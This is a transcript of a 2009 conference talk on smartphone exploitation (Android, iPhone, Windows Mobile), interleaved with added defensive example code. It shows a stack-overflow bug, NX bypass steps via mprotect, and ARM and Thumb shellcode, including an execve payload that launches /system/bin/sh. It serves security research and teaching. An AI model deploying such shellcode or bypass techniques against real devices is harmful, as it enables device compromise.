- 'smartphone (in)security' - cansecwest · "smartphone (in)security" nicolas...
TRANSCRIPT
![Page 1: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/1.jpg)
"Smartphone (in)security"
Nicolas Economou and Alfredo Ortega
March 18, 2009
In this talk:
1. Introduction
2. Smartphone Security overview
3. Exploitation and shellcodes for both platforms
4. Demonstration
5. Real vulnerabilities reported
Introduction
What is a smartphone?
1. No clear definition.
Figure: Not a smartphone!
2. Common cellphone with advanced features and complete OS
3. Big players: Nokia (Symbian), Apple (iPhone) and RIM (BlackBerry)
4. Google Android: The newcomer
Android and iPhone
Figure: Unix and WebKit based: high compatibility
1. iPhone 2.2.1: ARMv6 CPU, Mac OS X (Darwin 9.4.1)
2. Android R1.1: ARMv5 CPU, Linux 2.6.25
3. Windows Mobile 6.1: ARMv5 CPU, Windows CE 5.2.x
Why attack smartphones?
1. Personal data and identity theft
2. High-speed, permanent connection (3G)
3. Small variability (few security updates)
4. High bug count (few audits, short time-to-market)
5. Terrorist target
Figure: Exploit writer (Terrorist)
Protections (simplified diagram)
Figure: Memory Maps. Android: code (.TEXT) at 0x00008000, data (.DATA) and heap contiguous, libs at 0xAFB00000, stack at a random address. iPhone: code (.TEXT) at 0x00001000, data (.DATA) and heap contiguous, stack and libs marked NX; the other address shown is 0x30000000.
![Page 10: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/10.jpg)
Protections (Windows Mobile)
Figure: Memory Map - Windows Mobile 6.1. The address space is divided into slots: slot 0 at 0x00000000 holds the active process, slot 1 at 0x02000000 holds DLLs (and shared heaps), slots 2 to 32 hold process 1 to process 32 (0x04000000 to 0x42000000), and the slots above that, up to slot 63, hold memory mapped files (0x42000000 to 0x80000000). Other boundaries shown: 0x3E000000, 0x3F000000, 0x40000000, 0x76000000.
![Page 11: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/11.jpg)
Protections (comparison)
Table: Exploit mitigation techniques

Protection     Android   W. Mobile     iPhone
Stack NX       -         -             Yes
Heap NX        -         -             Yes
Cookie         -         Yes, 16 bit   -
Random Libs    -         -             -
Random Stack   Yes       -             -
SEH            -         stack         -
![Page 12: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/12.jpg)
Example bug

```c
int main(int argc, char *argv[]) {
    char buffer[64];
    unsigned int len = 0;
    ...
    /* Accepting connection */
    client = accept_connection(sock);
    /* Read header */
    read_socket(client, (char *)&len, 4);
    /* Read data: len comes straight from the peer and is never
       compared against sizeof buffer, so a large header overflows the stack */
    read_socket(client, buffer, len);
```
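The slide shows only the vulnerable fragment. The program below is an added example (not from the slides or from the authors' code) showing the same length-prefixed protocol read with the missing bounds check in place. The socket is replaced by a constructed in-memory byte stream so it runs offline; `read_socket()` is assumed to behave like the slide's helper (fill exactly n bytes or fail), and `recv_message()` is the hardened replacement. One scenario sends an honest 5-byte message, the other a header claiming 0x1000 bytes, which the original code would copy over the 64-byte stack buffer.

```c
/* Added example: bounds-checked version of the slide's length-prefixed read. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUFFER_SIZE 64

/* Constructed stand-in for a connected socket: a byte stream and a cursor. */
struct fake_client {
    const unsigned char *data;
    size_t len;
    size_t pos;
};

/* Mirrors the slide's read_socket(client, buf, n) (assumed semantics):
 * returns 0 on success, -1 if fewer than n bytes remain. */
static int read_socket(struct fake_client *c, char *buf, size_t n)
{
    if (c->len - c->pos < n)
        return -1;
    memcpy(buf, c->data + c->pos, n);
    c->pos += n;
    return 0;
}

/* Hardened receive: decode the header exactly as the original does (4 raw
 * bytes in host order), then reject any length that does not fit the
 * caller's buffer BEFORE reading into it.  Returns the payload length, or
 * -1 for a truncated, empty or oversized message. */
int recv_message(struct fake_client *c, char *buffer, size_t buffer_cap)
{
    unsigned int len = 0;

    if (read_socket(c, (char *)&len, sizeof len) != 0)
        return -1;                      /* truncated header */
    if (len == 0 || len > buffer_cap - 1)
        return -1;                      /* would overflow: refuse, don't silently truncate */
    if (read_socket(c, buffer, len) != 0)
        return -1;                      /* peer promised more bytes than it sent */
    buffer[len] = '\0';
    return (int)len;
}

/* Build a frame in host byte order, matching how the slide reads the header. */
static size_t make_frame(unsigned char *out, unsigned int declared_len,
                         const char *payload, size_t payload_len)
{
    memcpy(out, &declared_len, sizeof declared_len);
    memcpy(out + sizeof declared_len, payload, payload_len);
    return sizeof declared_len + payload_len;
}

/* Scenario 1: honest 5-byte message.  Returns the length if the buffer
 * holds "hello" afterwards, -2 otherwise. */
int demo_honest(void)
{
    unsigned char frame[128];
    char buffer[BUFFER_SIZE];
    size_t n = make_frame(frame, 5, "hello", 5);
    struct fake_client c = { frame, n, 0 };
    int r = recv_message(&c, buffer, sizeof buffer);
    return (r == 5 && strcmp(buffer, "hello") == 0) ? r : -2;
}

/* Scenario 2: header claims 0x1000 bytes for a 64-byte buffer.
 * The slide's code would write past the stack buffer; this returns -1. */
int demo_oversized(void)
{
    unsigned char frame[128];
    char buffer[BUFFER_SIZE];
    size_t n = make_frame(frame, 0x1000, "AAAAAAAA", 8);
    struct fake_client c = { frame, n, 0 };
    return recv_message(&c, buffer, sizeof buffer);
}

int main(void)
{
    printf("honest message:    %d\n", demo_honest());     /* 5 */
    printf("oversized message: %d\n", demo_oversized());  /* -1 */
    return 0;
}
```

The check must come before the data read: once `read_socket(client, buffer, len)` has run with an unchecked `len`, the return address is already gone. Rejecting the message (rather than capping `len` at the buffer size) also keeps the stream in sync, since a silently truncated read would leave the remainder of the payload to be misparsed as the next header.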
Tools and versions
iPhone: Mac OS X, Darwin 9.4.1, gcc 4.0.1. Debugger: iphonedbg 1.02b (http://oss.coresecurity.com/projects/iphonedbg.html)
Android: android-sdk-linux_x86-1.1_r1, CodeSourcery arm-2008q1-126. Debugger: GNU gdb (http://ortegaalfredo.googlepages.com/android)
Windows Mobile 6.1: Visual Studio 2005. Debugger: GNU gdb for WinCE
iPhone-tunnel
1. Opens a TCP tunnel from the PC to the iPhone over the USB cable
2. Inspired by iphuc
3. Needs iTunes installed (uses certain services from it)
4. Download from: http://oss.coresecurity.com/repo/iphone_tunnel-v1.01+.zip
iPhone-tunnel
Figure: Tunnel internal working model. On the local PC, iPhone_tunnel.exe talks TCP to the Apple Mobile service provided by iTunes, which carries the connection over USB to the iPhone 3G; from there the tunnel reaches the network (labels shown: NET, WEB, TCP, USB).
iPhonedbg
1. Application for iPhone process debugging
2. Was created using "weasel" as a guide
3. Interface based on the Windows ntsd.exe debugger
4. Download from: http://oss.coresecurity.com/repo/iphonedbg-v1.01.zip
5. Nowadays, a full-featured native GDB is available for the iPhone.
Exploiting the iPhone
1. With all those protections, is it possible to bypass the protections on the iPhone?
2. mprotect(0x2ffff000, 0x1000, READ WRITE EXEC)?
3. mprotect(0x2ffff000, 0x1000, READ EXEC); jmp stack;
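The comparison table and the mprotect sequence above both come down to page permissions: does the stack or heap carry an execute bit, and will the kernel hand out a writable and executable page at all. The program below is an added example (not from the slides or the authors' tools) with two defender-side checks for a Linux/Android host: `check_maps_text()` parses `/proc/<pid>/maps`-format lines and reports whether the `[stack]` and `[heap]` mappings are executable (the "Stack NX" and "Heap NX" rows), `check_maps_live()` runs the same parse on the current process, and `probe_rwx_allowed()` asks for a READ WRITE EXEC page the way the slide's first mprotect does and reports whether the kernel refuses. The `SAMPLE_MAPS` text is constructed input describing a process with an executable stack and a non-executable heap, not a real capture.

```c
/* Added example: NX / RWX checks for the mitigations in the table. */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

struct nx_report {
    int stack_exec;   /* 1 if [stack] has the 'x' bit, 0 if not, -1 if no [stack] line */
    int heap_exec;    /* same for [heap] */
};

/* Parse text in the /proc/<pid>/maps format:
 * "start-end perms offset dev inode [path]" (path absent for anonymous maps). */
struct nx_report check_maps_text(const char *maps)
{
    struct nx_report r = { -1, -1 };
    while (*maps) {
        char line[512] = {0}, perms[8] = {0}, path[256] = {0};
        unsigned long start = 0, end = 0;
        const char *nl = strchr(maps, '\n');
        size_t n = nl ? (size_t)(nl - maps) : strlen(maps);
        if (n >= sizeof line) n = sizeof line - 1;
        memcpy(line, maps, n);           /* one line at a time so %s cannot run past it */
        if (sscanf(line, "%lx-%lx %7s %*s %*s %*s %255s", &start, &end, perms, path) >= 3) {
            int exec = (perms[2] == 'x');
            if (strcmp(path, "[stack]") == 0)
                r.stack_exec = exec;
            else if (strcmp(path, "[heap]") == 0)
                r.heap_exec = exec;
        }
        maps = nl ? nl + 1 : maps + n;
    }
    return r;
}

/* Same check on the running process (Linux only); fields stay -1 without /proc. */
struct nx_report check_maps_live(void)
{
    struct nx_report r = { -1, -1 };
    static char buf[65536];
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f) return r;
    size_t got = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[got] = '\0';
    return check_maps_text(buf);
}

/* 1 if an anonymous page can be made readable+writable+executable, 0 if
 * mprotect refuses (what the slide reports for the iPhone), -1 if mmap fails. */
int probe_rwx_allowed(void)
{
    void *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return -1;
    int rc = mprotect(p, 4096, PROT_READ | PROT_WRITE | PROT_EXEC);
    munmap(p, 4096);
    return rc == 0 ? 1 : 0;
}

/* Constructed sample: executable stack, non-executable heap. */
static const char SAMPLE_MAPS[] =
    "00008000-0000a000 r-xp 00000000 b3:02 1234 /system/bin/demo\n"
    "0000a000-0000b000 rw-p 00002000 b3:02 1234 /system/bin/demo\n"
    "0000b000-00010000 rw-p 00000000 00:00 0 [heap]\n"
    "afb00000-afb20000 r-xp 00000000 b3:02 99 /system/lib/libc.so\n"
    "bea00000-bea1e000 rwxp 00000000 00:00 0 [stack]\n";

int sample_stack_exec(void) { return check_maps_text(SAMPLE_MAPS).stack_exec; }
int sample_heap_exec(void)  { return check_maps_text(SAMPLE_MAPS).heap_exec; }

int main(void)
{
    struct nx_report s = check_maps_text(SAMPLE_MAPS);
    struct nx_report l = check_maps_live();
    printf("sample: stack exec=%d heap exec=%d\n", s.stack_exec, s.heap_exec);
    printf("live:   stack exec=%d heap exec=%d rwx page allowed=%d\n",
           l.stack_exec, l.heap_exec, probe_rwx_allowed());
    return 0;
}
```

On the constructed sample the report is stack exec=1, heap exec=0. The live numbers depend on the kernel: a platform that enforces the table's "Stack NX / Heap NX" rows shows 0 for both, and one that refuses the RWX request behaves like the iPhone in step 2 above, which is why that slide falls back to a READ EXEC mapping instead.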
Exploiting the iPhone
Figure: iPhone exploitation
Android exploiting
Figure: Android exploitation. Stack or heap overflow; the stack address is random, so the exploit returns through a "jmp sp" instruction. Addresses shown: 0x40000000 and 0xBF000000.
Binary compatibility
Figure: Syscall examples. Arguments are passed in R0-R3 on both platforms; the syscall number goes in R7 on Android and in R12 on the iPhone:
    int execve(const char *filename, char *const argv[], char *const envp[]);   R7 = #11 (Android), R12 = #59 (iPhone)
    ssize_t write(int fd, const void *buf, size_t count);                        R7 = #4 (Android), R12 = #4 (iPhone)
Shellcode Android/iPhone

```c
char shellcode[] =
    // sys_write(...)
    "\x0f\x80\xa0\xe1"   // mov r8, pc
    "\x04\x70\xa0\xe3"   // mov r7, #4 (syscall #)
    "\x00\x00\xa0\xe3"   // mov r0, #0 (stdout)
    "\x08\x10\xa0\xe1"   // mov r1, r8 (r1 -> pc)
    "\x2C\x10\x81\xe2"   // add r1, r1, #0x2C
    "\x0e\x20\xa0\xe3"   // mov r2, #0xe (size of the string)
    "\x07\xC0\xa0\xe1"   // mov r12, r7 (compat iphone)
    "\x80\x00\x00\xef"   // svc 0x00000080
    // sys_exit(1)
    "\x01\x00\xa0\xe3"   // mov r0, #1
    "\x01\x70\xa0\xe3"   // mov r7, #1 (syscall #)
    "\x08\x80\xa0\xe1"   // NOP (mov r8, r8)
    "\x07\xC0\xa0\xe1"   // mov r12, r7 (compat iphone)
    "\x80\x00\x00\xef"   // svc 0x00000080
    "hi everybody!\n\x00";
```
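When reviewing a byte string like the one above, the useful check is whether each comment really matches its bytes and which syscall each `svc` ends up invoking under the two numbering schemes from the "Binary compatibility" figure. The program below is an added analysis example (not from the slides or the authors' tools): a decoder for the four ARM encodings the slide uses (`mov rd, #imm`, `mov rd, rm`, `add rd, rn, #imm`, `svc`) that propagates known register values and, at every `svc`, records r7 (the Android/Linux syscall number) and r12 (the iPhone number). `SLIDE_ARM` is a copy of the 13 instruction words from the slide, without the trailing string. Running it shows both calls are set up identically for both kernels (write = 4, exit = 1) and that the word commented as the size actually loads 14, the length of "hi everybody!\n". The Thumb variant on the next slide uses a different encoding and is not covered.

```c
/* Added example: minimal ARM decoder with constant propagation for syscall review. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct svc_site { uint32_t imm; uint32_t regs[16]; };   /* register snapshot at each svc */

struct trace {
    uint32_t val[16];
    int known[16];
    struct svc_site svcs[8];
    int nsvc;
    int unknown;          /* instructions the decoder could not classify */
};

/* ARM data-processing immediate: 8-bit value rotated right by 2*rot. */
static uint32_t arm_imm12(uint32_t w)
{
    uint32_t imm8 = w & 0xff, rot = ((w >> 8) & 0xf) * 2;
    return rot ? (imm8 >> rot) | (imm8 << (32 - rot)) : imm8;
}

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Decode one word, update the register model, emit a disassembly line. */
static void step(struct trace *t, uint32_t w, char *out, size_t cap)
{
    uint32_t rd = (w >> 12) & 0xf, rn = (w >> 16) & 0xf, rm = w & 0xf;

    if ((w & 0x0f000000) == 0x0f000000) {                /* svc #imm24 */
        uint32_t imm = w & 0x00ffffff;
        if (t->nsvc < 8) {
            t->svcs[t->nsvc].imm = imm;
            memcpy(t->svcs[t->nsvc].regs, t->val, sizeof t->val);
            t->nsvc++;
        }
        snprintf(out, cap, "svc #0x%x   (android r7=%u, iphone r12=%u)", imm, t->val[7], t->val[12]);
    } else if ((w & 0x0fff0000) == 0x03a00000) {         /* mov rd, #imm */
        t->val[rd] = arm_imm12(w); t->known[rd] = 1;
        snprintf(out, cap, "mov r%u, #%u", rd, t->val[rd]);
    } else if ((w & 0x0fff0ff0) == 0x01a00000) {         /* mov rd, rm */
        t->val[rd] = t->val[rm]; t->known[rd] = t->known[rm];
        snprintf(out, cap, "mov r%u, r%u", rd, rm);
    } else if ((w & 0x0fe00000) == 0x02800000) {         /* add rd, rn, #imm */
        t->val[rd] = t->val[rn] + arm_imm12(w); t->known[rd] = t->known[rn];
        snprintf(out, cap, "add r%u, r%u, #%u", rd, rn, arm_imm12(w));
    } else {
        t->unknown++;
        snprintf(out, cap, "??? 0x%08x", w);
    }
}

/* Run the decoder over len bytes of little-endian ARM code. */
struct trace trace_arm(const unsigned char *code, size_t len, int print)
{
    struct trace t;
    memset(&t, 0, sizeof t);
    for (size_t off = 0; off + 4 <= len; off += 4) {
        char line[96];
        step(&t, le32(code + off), line, sizeof line);
        if (print) printf("%04zx: %s\n", off, line);
    }
    return t;
}

/* The 13 instruction words copied from the slide (52 bytes, string omitted). */
static const unsigned char SLIDE_ARM[] =
    "\x0f\x80\xa0\xe1" "\x04\x70\xa0\xe3" "\x00\x00\xa0\xe3" "\x08\x10\xa0\xe1"
    "\x2c\x10\x81\xe2" "\x0e\x20\xa0\xe3" "\x07\xc0\xa0\xe1" "\x80\x00\x00\xef"
    "\x01\x00\xa0\xe3" "\x01\x70\xa0\xe3" "\x08\x80\xa0\xe1" "\x07\xc0\xa0\xe1"
    "\x80\x00\x00\xef";
#define SLIDE_ARM_LEN (sizeof SLIDE_ARM - 1)

int slide_svc_count(void) { return trace_arm(SLIDE_ARM, SLIDE_ARM_LEN, 0).nsvc; }
int slide_unknown(void)   { return trace_arm(SLIDE_ARM, SLIDE_ARM_LEN, 0).unknown; }
/* Value of register reg at the i-th svc, or -1 if out of range. */
int slide_svc_reg(int i, int reg)
{
    struct trace t = trace_arm(SLIDE_ARM, SLIDE_ARM_LEN, 0);
    return (i >= 0 && i < t.nsvc && reg >= 0 && reg < 16) ? (int)t.svcs[i].regs[reg] : -1;
}

int main(void)
{
    trace_arm(SLIDE_ARM, SLIDE_ARM_LEN, 1);
    return 0;
}
```

Because the shellcode copies r7 into r12 before each `svc`, the same bytes request write(2) and exit(2) on both kernels; the execve variant two slides on has to load the two registers separately (#11 versus #59), which is exactly the case this kind of trace makes visible.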
Shellcode Android/iPhone THUMB

```c
char shellcodeThumb[] =
    // write()
    "\x46\xf8"   // mov r8, pc (get EIP)
    "\x20\x02"   // mov r0, #2 (stderr)
    "\x27\x04"   // mov r7, #4 (syscall write)
    "\x46\x41"   // mov r1, r8 (string)
    "\x31\x14"   // add r1, #0x14
    "\x22\x10"   // mov r2, #0x10 (size)
    "\x46\xbc"   // mov r12, r7 (compat iphone)
    "\xdf\x80"   // svc #0x80
    // exit(1)
    "\x21\x01"   // mov r1, #1
    "\x27\x01"   // mov r7, #1 (sys_exit)
    "\x46\xbc"   // mov r12, r7 (compat iphone)
    "\xdf\x80"   // svc #0x80
    "hi everybody!\n\x00";
```

(No nulls!)
Shellcode Android/iPhone execve

```asm
start:
    b codestart
arg0: .ascii "/system/bin/sh\x00"
arg1: .ascii "-c\x00"
arg2: .ascii "/system/bin/service\x00"
env:  .ascii "\x00\x00\x00\x00\x00\x00"
codestart:
    mov r8, pc
    sub r0, r8, #100    @ arg0
    sub r1, r8, #85     @ arg1
    sub r2, r8, #82     @ arg2
    sub r3, r8, #30     @ env
    sub r4, r8, #24     @ array0
    str r0, [r4]
    add r4, r4, #4      @ array1
    str r1, [r4]
    add r4, r4, #4      @ array2
    str r2, [r4]
    sub r1, r8, #24     @ array0
    sub r2, r8, #30     @ env
    mov r7, #11         @ syscall #
    mov r12, #59        @ compat iphone
    svc #0x01010101
```
Demo!
Figure: Demo-time!
Real thing:
1. CORE-2008-0124: Multiple vulnerabilities in Google's Android SDK: browser exploit for the BMP format.
2. CORE-2008-0603: iPhone Safari JavaScript alert Denial of Service: WebCore process denial of service.
3. Many others (not discovered by us!)
Final questions?
The end!